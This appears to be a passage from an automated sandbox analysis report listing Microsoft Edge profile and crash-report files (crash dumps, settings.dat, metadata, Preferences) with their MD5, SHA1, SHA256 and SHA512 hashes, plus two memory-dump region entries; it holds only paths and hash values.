| SHA1 | 63687cdc44173a4e049d148269a364878a40984f |
| SHA256 | f374b99a30d86b8221308ca95afb2db3ca39f350c4360f8d07a587fec75581dd |
| SHA512 | 3a06c244e66b6359599a863414f44cda8b563818b68b06ef358803e80913aaaaa37bfa9df09f43ac6e50db424eaebaa2f283d6c8db68065013c3625282856f62 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7d0044ff-d120-48c8-ac2e-b1bc482948b9.dmp
| MD5 | ad38a16315380e2625ca5734725921ac |
| SHA1 | cb6f0d56c60d3e17ab7e04b063d66c72cf7f0f0c |
| SHA256 | 72e9fb390a7bd457190db60189ead088f8c164ac632884e536a36d6d79fd5aa3 |
| SHA512 | 905e4010a288a06f69bad296c4b4c6db78a6637ab969df545f54b9c1893cc15d64b5029f95c0d3044dd531264a31344e9bb16c8a7642ed22dca986b1ced4a9ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 34bc2a71d8bf2e13bd2531921f5dbc9b |
| SHA1 | 415ce3049ff8aed682f2a1f5b4611df2d7ada5ca |
| SHA256 | 5870fbf58a8c3bc0be785006e88f2aa30eda550998f6e69b8d296bbddb521f4f |
| SHA512 | bc392dfa95e3bab4ad508a688e37aad8940359d768093b03d7e76a11b817513aaa3a33589b26fbd0797d1429924798ebf750ca2a68fd9a41e917179a223e7a43 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e40e1c048b4095a3add7c81d57fec9cb |
| SHA1 | 9cb1b1af5b9ec900bb73fdf29afabcfa41f90514 |
| SHA256 | 0fd9e7e6ec877d2d314b8854d28daee07b8cd32c8e81a995c772aeb357095541 |
| SHA512 | 86080dc6f33ea400eb8491e51382182c3f03ab97dc270ae4623d782c5b1680f9176c6b31ddfcb340b1647b40a2d4057abf742cf35e4360045824d86cbae70117 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 399a44105142b504e89c105b663d8d32 |
| SHA1 | 8ed19553edae43e11f7d1c14554df8014bd1f186 |
| SHA256 | cc648bd857157c0de3dc955c758602c7b5312618f801e9b0fc2deada08585bcf |
| SHA512 | e9cda670abec4f9667dbdf224d6746adeb84cb69d2ca2584b1f55563ea8ce31c4b738438f32439655323388ebace6acb51bf9fae1e5a4179904426e32fb5c8e3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\bf24c7ca-28a8-45cf-a63f-2fdc02e005a0.dmp
| MD5 | a5a0e8c28cfbf8a2041d212f794d3895 |
| SHA1 | a5a1204e19428a8d240f08e9dea3870d61e047ca |
| SHA256 | 7c2a37c88821f0a0b82b367f264be1706dd0e54fbab6a36f2d91f6106a38a00a |
| SHA512 | 7a1148adbbfafef1f5444f0a7ad77888b09633f44c4f1f98823105ce307393c64ac183f6038f699d827cf9997374137b89de2c3240129d05c6f38c79be41cefe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3bba951f8bda9eaeeebc3a2a226e3e13 |
| SHA1 | 411f9bc0200485d535d1edfa0459274d030aaac5 |
| SHA256 | db648b5d3057dac4c5168b422417c06c318dbb96cf3d153332b7547231233cd0 |
| SHA512 | 2a0ebe7c4b34544899c0e9afda4494fd605310b7cac0285023b9458fbaa2a6eb3c94b84b91f91d1c44a5cc99ccbcb7851edf9a9500717a4b7c8103e7a19d2416 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d481eba96b5274dc992285a30acbca11 |
| SHA1 | 8c7f4034b3a942d983a2ce162060a28b07dac6a4 |
| SHA256 | de0cde55440fec5dc1a16e74f405e7973642a720a4ddfd51036f664a9280e870 |
| SHA512 | 957f149d3c60f93a7c873ee43dbef809f945ea9d6beaa4199d8797b9029a6333df3406921fb096712fde1b0068540a604e1f3215c9ddce71088d129ca0c17802 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d82fc7b63610132e6668a26f74aa0c1c |
| SHA1 | 22de9828de506bce53c7fa6fcd0d47b252147dc8 |
| SHA256 | 75352e3e5cde0021af56b8a7655ba68226e9423fcb2cf3c5b81554227517839d |
| SHA512 | 3a3f9fb940659ce21babcb435bf27e7b5453f08a7435d64c2c2c6a6287b79bd1db7cef55f973cb588b404c05034f54787d744b421509c55134e164b8d0935e69 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1de1776d-ed82-4c02-9efe-c79b6ff04150.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c069f329ccded117d76eacdeda3a2da7 |
| SHA1 | d5163d692d08cd325c94bfa9df8fddc05a560098 |
| SHA256 | a5fe35721885a7010ff34820498ea227c027c9aa76f1d88f84c30af39c82e795 |
| SHA512 | 9173c2c9c4a59c1fbd53d57ede4fada23dedc9e7e3695004d417fe97c760492ffa48e296df993255b00cae6268206337daacf3afde3c28a78a092865c929a8e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 42dc88277a574d4b272434c3306229ee |
| SHA1 | 4d61f91af1c55c22f4d452b224e91b47056f5d83 |
| SHA256 | 69c0ae205c3d49f59947cd61fa2eea3e5a7c6e05fc7bbbe87f3a934eef6e5810 |
| SHA512 | 4e5a74f8bbe04ebc1f882a9cacb8ad63922b7fa4c6e93ab7eeec72586352d630e7b37e35433011857e256a2736bb41417cf2c11097c506d688d7d94aaee0f54d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f3a2f67a-a0c1-4efc-83b2-56c9b7cc1d77.dmp
| MD5 | 21d9dd55a9758f58e0d352c7a611aae0 |
| SHA1 | 4099d022dc8c98d7b944dab388e30bb6a4d9a6a7 |
| SHA256 | c13a6e5aefc403074d6dcf472c376b183a98c8706ca2e971710438544d7c99df |
| SHA512 | b1c894cc15bb12569b36d88dfb970fbb9b9746de46a2e3d8283f7703415a0e2bb4c5e8f4c00c64f3c1769d231f6eeb53892a34aa88da83c4e62e16e0babd2b3f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 60db5128b0a7a90ad89815b4cfea0788 |
| SHA1 | efe4607904a8f05de788a2e4d76d8475a001c9c5 |
| SHA256 | 09b2bb18cb5f2f0559a7a1222130f074545fd88e8b2afb031a018df33e97a45f |
| SHA512 | d187ea763cd19309bc8e76ce0379c2df205d37c287608fa384d90392668292a71b1289a70101ee017477713c66863d14559ec8517672add9bae690bf8e5aebe4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\97790bdd-d0c7-4759-8fde-1bb1eb2180f2.dmp
| MD5 | 8e68c37b4d8da0eb2559e0b52084201a |
| SHA1 | e62515833cc119bbae9ef1569c48823f6660d772 |
| SHA256 | e2c76687d5cd768a59ecfa667cf8386dbd3ba6e91754a19f11470059160eb901 |
| SHA512 | bbc4c7b4b055bb4ac7e5585c1577585c2819c11413bc6ea5022255f90131100cec634f71857f07d74896320c1ea8a85090334fdba64f5327c5287e788a3547dc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 52948d7c448f2cfc2f85737d317034a0 |
| SHA1 | 3819166e20d990f325e2124e6ef417263648ec04 |
| SHA256 | aa61de25a49e242511d2458c8c73ade2be9e41e60b1f6ad68ffb46e9cfd0a545 |
| SHA512 | d323b061a3d422cd9d671414e48b38797a1973d7807a4bf34f8914422db96bbafa8973e4819b9a3cdb357da7ff906c1570acfb091dc568f5ff13b79e9e1b218f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ee085762-bdd6-4bd5-9199-2ba12d74e1ed.dmp
| MD5 | 54be485c85fea96485fb84304caf4cd6 |
| SHA1 | 071273e65fc5a8b52e1baad3e286cd0fc3e51970 |
| SHA256 | 68e01d49f1a8a7f789e025ddeb0aa41fa0fcde6c8a786493225d502db2eb17f3 |
| SHA512 | 3d38bda27d79c71b5c9b6ade5200ae8fd8642fed537753c3b1af87f6ca7c331a879c36a04f27ce6894ed9500dab55526ec7a1a1ad0a3103904760f58b47409f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d41eed92f4d58a3df17cc42af495356b |
| SHA1 | 0d0c84334f2b183a51eeeff95bc6f91d524b9e21 |
| SHA256 | fcacc9d97ddd4d8ff335837178fec29c7aff4200e98245e247ef657d3317d8b8 |
| SHA512 | 6ce6ed8e1282c8549ab9f441904d72270b957b33c065e67cb41cd5785b3faf1826c385b9a31d65db3a8e2044f1c3536af7f68d1b50fe2e043b70395928f2a7b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | a218e0b8623ecf4c1b9c5a5c37fe48d8 |
| SHA1 | ad6e24a1e9d8b9a9dc82acc2aa3b746f140b0121 |
| SHA256 | 0848e751531ca3e3b6bd797d9dfcc5ea1efff50553f39072fa44e941c5e68020 |
| SHA512 | 53eebc083e8faa6e55a86f004552e62575850f5c04001de39f42f565610a68e23606f70b009c878cea436a5f7b4e4658c9f04e21d01c48ea19c4bd286eccb362 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8e21fa6b-7ead-4766-bba3-84a5d8238943.dmp
| MD5 | 93d13585637ac48905e86b568cd8be6a |
| SHA1 | 30526954e37f20a9da7293f13e55102f65e6dcbf |
| SHA256 | 7995f0381294d295cad0190962b6a4fd341455638371b7afac6cbf982ef9176b |
| SHA512 | 2054cd077a1e0cb62f3f2ec353b82beac20be64ca067542a7510d276f1457713e433d940835a5bbc641cb4789190db3b0c35270f3abb4daf3aa09926b8657b08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 4fd90550eb37ea7fc7455f1fd0fa912b |
| SHA1 | fdfd3d3e64f7213d52ad1ab5486cf57e917df854 |
| SHA256 | ad897daa3f88df25571de10f4557f543f6555065083e33b65da0b4243b8c0fa8 |
| SHA512 | 33288ad912a87f11ac732589191afe7dd22b61356e8318f64073c3dc7b7cb5ed8182e2efdb58a40daf5e1360f2c2b6cb8935f20fc4939e6124707226cf2ac247 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7b31eace-96b0-47fd-abc2-a938c5ab6f5f.dmp
| MD5 | 5e3e1636247566f1a9e46dcd4d08d1a6 |
| SHA1 | 65757d0d43accca65922cbd96ea8b4ba577e906d |
| SHA256 | cb6a323c0893617039fe72f6da5e7531598bc689303087796269c56a5c41bc69 |
| SHA512 | 622f71a9c72367f91835430c4274c7bfdfce887d5f71ec86cc3a66e279ad79e57235496ca4510b042accc9968395544443e289f5ccc1c749371a251191a8d901 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 912c1b9a690dd05db0ccaa7970777f3f |
| SHA1 | 8d660e2c8983394eab804dd09e38b670d067de8c |
| SHA256 | 61e742c6d187efca4ca6a64ed88f212d7bab658bbc87c803d47e56a17773ed82 |
| SHA512 | c081806a9891aad021b61589ca59cd4c61defc133c7da4405c391ac287c1b51e8c501eebd99812ad38cf0ce490a377750a2d336f55a727c9f32da2985492d42d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d9824924-d9fe-4e69-aa1d-f1ad1a0dbf45.dmp
| MD5 | 2861ce3226f7b856bd8143af13670fa6 |
| SHA1 | 8c9d85a604db6b664f0ce18a4eebca8cf6b748db |
| SHA256 | af9480e376d44544f976bd61cd6148c2c41ffc8535e0391211909d7f3f164e0c |
| SHA512 | b772137ec620570968517cfa859c47d039fdb480150a62b723548d0dd9bdd35189ea6639b2fb609b1c41ea8943de16513f2d01690a4a0ee60f24527b5a582b32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | eb92a328fd7cd9a75e48b44f4bb44308 |
| SHA1 | 355ea2fbb1e857a81edc941a89d4c561890e0bc2 |
| SHA256 | cae2a74809a45024ad3a78f49cc5d40954eeed22db4154669696c78e925fbd65 |
| SHA512 | 3117233f02358f3ecba9d5f0c2b1c73fec3f8deaf8b8e9d37a6d89dbff53a8c03e3d21027dac81fdc7be94748d5406f01c3ad0ae77770c72c342ebc3ffe5bf89 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 06b6f22f886812f14e0eb3e880e42b35 |
| SHA1 | b9d235c1a0c795ca1184e7236041c39a42f69580 |
| SHA256 | 11b9029764ccc34b1cde6c368510bf2aa5e9540f4b0598d4fe3291095934a989 |
| SHA512 | ee003860c302b2a0772ce5b2079a4db32772daf84385c751e098dda09e9730905ab390783377734f79ef4781573701328c2199ef3fc5138de2409ad63c0ebfa8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0ef9678e-5b9a-444a-b67b-2f1da524e926.dmp
| MD5 | 1222db2c0afe79e11389b8d49ff416fa |
| SHA1 | 64ff46e19b6205981a6489f3a9b1d445ecd07711 |
| SHA256 | 7fadcc2b797511bc24a4be721e4ade5d36643483bffa77be2f35d7b86f3ff91c |
| SHA512 | f762a7bd6da71ba3d4f07d721f93c9882e3d83089590b201c1e9678b0e91f0a40e864ea802a8aaa022dc8e815fd813f23ceff9a1414f12e226025b92c96a4b18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c4d2c004-f463-4ea0-bcd8-4cfd3dc20522.dmp
| MD5 | 925ed65271c895b2b44bd92b810edce0 |
| SHA1 | 3d98262096e70562d21b1301f7743d893613156d |
| SHA256 | c267eedca2a137904ef2f0911fb36b9bf340f8e1ba45b94219ddcb6a86a4df9c |
| SHA512 | d085936a42e334029524ce9db7f019fb813634d39965e5f525ef3c6cb2e32d318bea5e8a0715eb570c02c2609b5cf0d017fa18932b01440687fa915f808ac92f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | fe675660c9f79754482dc11ef1f3aac6 |
| SHA1 | be137787d26e7ea43ecfd2a4f036b3ac0e0fbd8b |
| SHA256 | 64557977db988b42906361dd3f484124ed1b9bb458d454e2971ffc1fc3a767ac |
| SHA512 | 0b07e8bb227b551aca29b78fba21c9906b0b3d5bd1f52cd0a825c8d50e7aa12afaa3a111f642223f4c78ce73dd57c31fff4ab88f51052e256b5e94ef1633eb95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2b08fdd6-cc78-4223-ac01-757221ff5d1b.dmp
| MD5 | 3613e381b60e8477348f46e4627ee11d |
| SHA1 | 0ae896ff91c2770e3dec92e0d4658517f076073f |
| SHA256 | 6c42fd4db6ff22734ef856780eb6f0b185719ba99073de50f388dc17b0d07e1f |
| SHA512 | bd92f66652933355ea5e7857d757a46f512468b02a3819b6e8291808afc25ebffb76a9cb3fc320defae57d35d6df95427658c770819b3d339080d1c9281412a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5fbbcf5e98501ad643a916b251fccec9 |
| SHA1 | c66bc75e8bfaf678031c732b8f72d1c76d63212d |
| SHA256 | 3cbb00709b5fbbc40ab639da142a96435ec0c1d511bec16d3d05db3661fe3c22 |
| SHA512 | 356cff1a875a4aa789dd4c4f36112f1265febf636bfdc3c25801555eac81a11c56662fac78f190268602bac5f5be18e3217f128bf6fb6d2cce2d13e13e5e574a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 88d3670aedd9c4f2d5b5644d34bdbc03 |
| SHA1 | 19b1b93f3cccc68acf47ce50469e4a3aaa8d6669 |
| SHA256 | d7188a8bffc744af0e84f9e2e75caa9d037ab25520f05aef2a063bd2c67b8c4f |
| SHA512 | d805450c13de2cd8c1703ab8e139193d53a357691072cd5d0b5cfa1c882f10b2c6c11cc49f2f38836c24c294524542b6a13aa7b9c4f1b156d631b2c4cf9f769e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b9c1177a-17b9-4ce1-9ad3-bd45e86dba09.dmp
| MD5 | 0e6995f4af6c8417268a3b6f12e6399f |
| SHA1 | 38b5dd97e70d2340c4dbaa2dd9f42eef8f7e2c43 |
| SHA256 | 0dc4279ff7b174331e349e7a3fe60ff9d2cdb735db903c01e44f2b7845a9ca58 |
| SHA512 | 848aafec47e6d5b6a0df4a24bc3c436047936f6e79c0f25a7010d2280bb4e09d6bef469b8476f0ce7ba21f6158638e3314859ef701fe8030d188c431392a46b8 |
memory/5436-1698-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/5436-1701-0x0000000000E90000-0x000000000134F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d20a0ff6fb738451151f0192df996bca |
| SHA1 | 6928c8adac56a75c28d369ce0647bf99954652d3 |
| SHA256 | 029476e4619860fa0238a31cbd06d591a57c28824f7041f57e6a3263a2dfbaa9 |
| SHA512 | 75454753274c11b5d1242a886a5222f220189609bcaba05a8042b57e3223a3a80b812f7e9bcb0ea18e7bbaad4a5cc00f539f8bd05842a7a44ef034546e0102c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 514c89e4bb6e6e0b609ad9b19fc13d64 |
| SHA1 | 157cccad482d3d2e6e57008c2612e71388d7d8a2 |
| SHA256 | d1796a948b3fc46d60d15b6e3efa88e25e002ca509ac1bb007739cd18a0ced61 |
| SHA512 | 138cfcf3195fac4f9422bd4b545cb40694e1677185c2f0f934163b454d68d3195a5b090c867c15cb49cc1b02831863ac09e1f53843b9f403a709bb767cc0e443 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 61f96367ad64c5482240b2d6a63ca5e7 |
| SHA1 | 24ba0f2ac372fef03d079f354b9a3c5ff08cb4d6 |
| SHA256 | e2b0a6555803ee15267484c8065f4d2ba6155ecfe18e9fc8a807533b05b8bbb3 |
| SHA512 | e6d336f96fcc3ac3b6d9b7e89205f99de0a3baec63fec63ea668213b6d494d4dbe110aa2a7f424edf5a71b4928f1792e2e1b79f5f8ee2d9c9ec8c3420e1741b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\af1d4bba-8dee-4f41-a7e6-8c227364f1f0.dmp
| MD5 | 6cf6119af132603f0912f92cc882c7c4 |
| SHA1 | 8bfbefb8902d10932d3c9d50ed217ee9ac47b384 |
| SHA256 | b578a8b8ff1f909bdba66674e93dfd57b9c39c6c00244da9b25abbadeaaa44ca |
| SHA512 | b4bd9ca04d7756623d23775b324e364991fbaeb52c7f4b9ad81e7bb44e832c1a0c8731efc19d95758131b420d1d81a73d39a819ea4b819e1b0c77bde147d34b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 646a45bb676278e3aeae9548b61b3428 |
| SHA1 | ba5cf8e031611d2200f8422554519bf636bee191 |
| SHA256 | dc97b68364174b1da16defb3229ef02752c0e10e3ac1cf81cc85df91ef27be3f |
| SHA512 | 2acf852ff3b6e636fadc9cf27c1b4f39484a0b903fab82af1de2d59c76e4fcc1f94e1d45c890bba38bca78b65234e8328ad7e06e0b52da3a54228fde7f012019 |